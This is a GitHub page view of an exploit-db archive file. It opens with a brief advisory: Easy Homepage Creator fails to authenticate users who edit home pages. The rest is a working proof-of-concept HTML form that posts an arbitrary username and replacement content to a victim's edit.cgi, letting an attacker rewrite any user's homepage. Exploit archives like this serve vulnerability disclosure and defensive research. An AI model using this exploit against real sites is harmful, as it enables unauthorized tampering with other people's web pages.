forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path21658.html
More file actions
executable file
·20 lines (18 loc) · 846 Bytes
/
Copy path21658.html
File metadata and controls
executable file
·20 lines (18 loc) · 846 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
source: http://www.securityfocus.com/bid/5340/info
The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages.
<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
</textarea>
<tr>
<td class=top>
<input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>